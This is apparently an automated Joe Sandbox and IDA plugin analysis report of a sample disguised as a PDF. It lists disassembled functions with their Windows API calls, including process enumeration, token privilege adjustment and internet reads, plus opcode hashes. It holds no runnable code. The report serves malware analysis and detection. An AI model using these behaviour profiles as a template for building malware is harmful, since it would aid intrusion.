                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                          • API String ID: 2574300362-1816364905
                                                                          • Opcode ID: dc0eaa46ba2672ccddf7eef5e8fdd20e218d4e2f093471e2270aa2f6bdb62f86
                                                                          • Instruction ID: 3972f8460fe3ffe576ff49e95fad66f89486b62e221c004ac068028aee4b5b04
                                                                          • Opcode Fuzzy Hash: dc0eaa46ba2672ccddf7eef5e8fdd20e218d4e2f093471e2270aa2f6bdb62f86
                                                                          • Instruction Fuzzy Hash: 50E0EC74600717CFDB205F25E804B967AD4EF09756B80C4F9E895D32A0EBB8D884CA60
                                                                          Function 00AF3190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 674341424-0
                                                                          • Opcode ID: e42391a26faa3e425954f56642dcb6969be4cee5fd0414d4909c9a67efc1ff49
                                                                          • Instruction ID: 231df25e9fe22c5cb492ba1d8adf6dae118d75b4b6313c453b7423a6cefd34c1
                                                                          • Opcode Fuzzy Hash: e42391a26faa3e425954f56642dcb6969be4cee5fd0414d4909c9a67efc1ff49
                                                                          • Instruction Fuzzy Hash: C8229B726083559FCB24DF64C981B6FB7E4EF84700F10492DFA9A97291DB70EA04CB92
                                                                          Function 00B5F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00B5F151
                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00B5F15F
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00B5F21F
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00B5F22E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                          • String ID:
                                                                          • API String ID: 2576544623-0
                                                                          • Opcode ID: f4320271578c9a28a52b8b45dfd0ccddd23b7d6dd63d2f7958e4d4bf12779591
                                                                          • Instruction ID: a82f2abe06efe1c060b56b92903c5131af5e54365ad7d32553bebbc34a79c280
                                                                          • Opcode Fuzzy Hash: f4320271578c9a28a52b8b45dfd0ccddd23b7d6dd63d2f7958e4d4bf12779591
                                                                          • Instruction Fuzzy Hash: EB518DB15083419FD310EF25DC85E6BBBE8FF88750F10486DF995972A1EB70A908CB92
                                                                          Function 00B440B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B440D1
                                                                          • _memset.LIBCMT ref: 00B440F2
                                                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B44144
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B4414D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                          • String ID:
                                                                          • API String ID: 1157408455-0
                                                                          • Opcode ID: e5aadeeacb51f96e2e8d95ea66971850016fddf9a5867ee31a83b13a805f96b0
                                                                          • Instruction ID: 4d0454e6ce2a3ab05065e4344af89a80c493d8269720c703f616e7428245231d
                                                                          • Opcode Fuzzy Hash: e5aadeeacb51f96e2e8d95ea66971850016fddf9a5867ee31a83b13a805f96b0
                                                                          • Instruction Fuzzy Hash: DE11AB759012287AD7305BA5AC4DFABBBBCEF45760F1041D6F908E72C0D6744F908BA4
                                                                          Function 00B3EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B3EB19
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen
                                                                          • String ID: ($|
                                                                          • API String ID: 1659193697-1631851259
                                                                          • Opcode ID: 77d89d16d0a96772a1a2ad53545c2df27b719d983d4feaf726facf9c903ae7cd
                                                                          • Instruction ID: 0d1bf0a27259300be2e003d64ca50403b264e189fc1be478fcf2fca91b29ad98
                                                                          • Opcode Fuzzy Hash: 77d89d16d0a96772a1a2ad53545c2df27b719d983d4feaf726facf9c903ae7cd
                                                                          • Instruction Fuzzy Hash: B2321575A006059FDB28CF19C481A6AB7F1FF48310F25C5AEE4AADB3A1E770E941CB40
                                                                          Function 00B525E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B51AFE,00000000), ref: 00B526D5
                                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B5270C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                          • String ID:
                                                                          • API String ID: 599397726-0
                                                                          • Opcode ID: ffc54265f638350dbec9b7ca0abbf1f763cbcce25361dd9677b342eaa85d45d7
                                                                          • Instruction ID: 2d532b4edb577941cbdee74497e04e1a090f120be2d39b70d9d31f94681b4397
                                                                          • Opcode Fuzzy Hash: ffc54265f638350dbec9b7ca0abbf1f763cbcce25361dd9677b342eaa85d45d7
                                                                          • Instruction Fuzzy Hash: C241C771501209BFEB20DB54DCC5FBB77FCEB45716F1040EAFE01A6180EA719D499A50
                                                                          Function 00B4B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00B4B5AE
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B4B608
                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00B4B655
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                          • String ID:
                                                                          • API String ID: 1682464887-0
                                                                          • Opcode ID: 0d046defc5bf54d7c78232eaa632f9b219d7e418d30427402b59d4a3a01ecfe8
                                                                          • Instruction ID: 51610623c695c7bdac6b616de2f105ecd46d13a6d315a225c82019aacb8a7d6d
                                                                          • Opcode Fuzzy Hash: 0d046defc5bf54d7c78232eaa632f9b219d7e418d30427402b59d4a3a01ecfe8
                                                                          • Instruction Fuzzy Hash: CF219035A00218EFCB00EF65E880EAEBBF8FF48310F1480A9E905AB351CB319915CF50
                                                                          Function 00B38CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B00FF6: std::exception::exception.LIBCMT ref: 00B0102C
                                                                            • Part of subcall function 00B00FF6: __CxxThrowException@8.LIBCMT ref: 00B01041
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B38D0D
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B38D3A
                                                                          • GetLastError.KERNEL32 ref: 00B38D47
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 1922334811-0
                                                                          • Opcode ID: 288db42751ee01751b28d6e9cc2cbed411968aab5c98aecb5f30bc6d4feb77ff
                                                                          • Instruction ID: 139a47d4537d2a2d88d75730caf193103370c3ec953c5711d4a74de86077c84d
                                                                          • Opcode Fuzzy Hash: 288db42751ee01751b28d6e9cc2cbed411968aab5c98aecb5f30bc6d4feb77ff
                                                                          • Instruction Fuzzy Hash: BB1182B2414305AFD728AF54EC85D7BB7F8EB44710B20856EF45597281EF70AC408A64
                                                                          Function 00B44C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00B44C2C
                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B44C43
                                                                          • FreeSid.ADVAPI32(?), ref: 00B44C53
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                          • String ID:
                                                                          • API String ID: 3429775523-0
                                                                          • Opcode ID: edb3aa3477e4d592c9fed715cdfd31e62fa9f5b3bf41f6bc136b41566ecd2d4d
                                                                          • Instruction ID: 5b1c1f91aa32c251f33bfdf0c1f89e7fb10d0854cac672c193b9833ca3c93690
                                                                          • Opcode Fuzzy Hash: edb3aa3477e4d592c9fed715cdfd31e62fa9f5b3bf41f6bc136b41566ecd2d4d
                                                                          • Instruction Fuzzy Hash: AFF03775A11209BBDB04DFE0AD89ABEBBB8EB08201F0044A9E901E2181E6B46A048B50
                                                                          Function 00AEE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ac26032ba0afc84aa6ffc6d0539c1412020d921fe94d2a1d2f7e326f589e6499
                                                                          • Instruction ID: 8011434dffe465312f29077f6b6dfb3062e81eec63551e03835cfbe3c2494fea
                                                                          • Opcode Fuzzy Hash: ac26032ba0afc84aa6ffc6d0539c1412020d921fe94d2a1d2f7e326f589e6499
                                                                          • Instruction Fuzzy Hash: 0922C170A00256CFDB24DF59D480ABEBBF1FF08300F1485A9E85A9B395E735AD85CB91
                                                                          Function 00B4C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00B4C966
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4C996
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: b7c540672fbf0f85dc2ecba5560b2dedbcbb9515c033c89f175eef7c56ce6ed7
                                                                          • Instruction ID: a7ba629d857a473b163ea66f13a14c6844f55b8707999cd7b1ac6120139d2d9d
                                                                          • Opcode Fuzzy Hash: b7c540672fbf0f85dc2ecba5560b2dedbcbb9515c033c89f175eef7c56ce6ed7
                                                                          • Instruction Fuzzy Hash: B51161726106009FD710EF29D845A2AFBE9FF84324F00855EF8A9D73A1DB74AD01CB81
                                                                          Function 00B4A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B5977D,?,00B6FB84,?), ref: 00B4A302
                                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B5977D,?,00B6FB84,?), ref: 00B4A314
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFormatLastMessage
                                                                          • String ID:
                                                                          • API String ID: 3479602957-0
                                                                          • Opcode ID: 0eab1a7fb75a588e74ba092f67d4c32ffa76f043124c2a491ba01421bda50491
                                                                          • Instruction ID: 0eacea2cd135fd6a8395929735f76c2f5ca774e9267c9c7e197934d01ec4c727
                                                                          • Opcode Fuzzy Hash: 0eab1a7fb75a588e74ba092f67d4c32ffa76f043124c2a491ba01421bda50491
                                                                          • Instruction Fuzzy Hash: F4F0823554822DABDB109FA4DC48FEA77ADFF08761F0082A5F918D7181EA709A44CBA1
                                                                          Function 00B38713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B38851), ref: 00B38728
                                                                          • CloseHandle.KERNEL32(?,?,00B38851), ref: 00B3873A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                          • String ID:
                                                                          • API String ID: 81990902-0
                                                                          • Opcode ID: 52112ca5884e2eb4284e904d8f4955f752e5a9d9f2a0a5c527f18bd53b9fd5df
                                                                          • Instruction ID: 5af2d9f938106afd4ef2c7f936abecee78b2309a026b163d87151c0c4765a039
                                                                          • Opcode Fuzzy Hash: 52112ca5884e2eb4284e904d8f4955f752e5a9d9f2a0a5c527f18bd53b9fd5df
                                                                          • Instruction Fuzzy Hash: D4E0B676014611EEE7252B64FC09D777BE9EB04350B248869F496814B0DBA2AC90DB50
                                                                          Function 00B0A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B08F97,?,?,?,00000001), ref: 00B0A39A
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B0A3A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 065a8caed0d7096cbc5e1c4824f02eaf05cc1ec211b83b2ff21fc83e8a82d0ab
                                                                          • Instruction ID: cd7b914dc5b9083b53db049ae4c6fc14d312d75206e483b337b1245b45a576e0
                                                                          • Opcode Fuzzy Hash: 065a8caed0d7096cbc5e1c4824f02eaf05cc1ec211b83b2ff21fc83e8a82d0ab
                                                                          • Instruction Fuzzy Hash: 48B0923105820AABCA002B91FC09BA83F68EB44AA2F404020F70D862A0EFA654508A99
                                                                          Function 00B0F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 07af707e14b5e8cef7a4f970e6b21910381a22d22f8746d0aa420d347fc023aa
                                                                          • Instruction ID: 534c3eab7194cda88d90c10692a4f3de9253285fc67a3c789000bde8e7fcac0e
                                                                          • Opcode Fuzzy Hash: 07af707e14b5e8cef7a4f970e6b21910381a22d22f8746d0aa420d347fc023aa
                                                                          • Instruction Fuzzy Hash: 9632D122E69F424DD7339634D872335A699EFA63C4F15D737E819B6EA6EF2884C34100
                                                                          Function 00B1267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 58430cfc37dc2282771f18c17bfc81ed0ffcd595a0ed1451fbb931165d727e1e
                                                                          • Instruction ID: 6097341b42849f7a14f6be20856f2de49e329beabd26fe3063bdc99f782c59c3
                                                                          • Opcode Fuzzy Hash: 58430cfc37dc2282771f18c17bfc81ed0ffcd595a0ed1451fbb931165d727e1e
                                                                          • Instruction Fuzzy Hash: 8BB1F120D2AF414DD2639A398875336B69CAFFB2C5F92D71BFC1A75D22EB2185C34141
                                                                          Function 00B48B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __time64.LIBCMT ref: 00B48B25
                                                                            • Part of subcall function 00B0543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B491F8,00000000,?,?,?,?,00B493A9,00000000,?), ref: 00B05443
                                                                            • Part of subcall function 00B0543A: __aulldiv.LIBCMT ref: 00B05463
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                                          • String ID:
                                                                          • API String ID: 2893107130-0
                                                                          • Opcode ID: 89c3d7f2bd3044f5cfec347c6a89d6b3d8d198d2677e2ffaf614444ceb8da2de
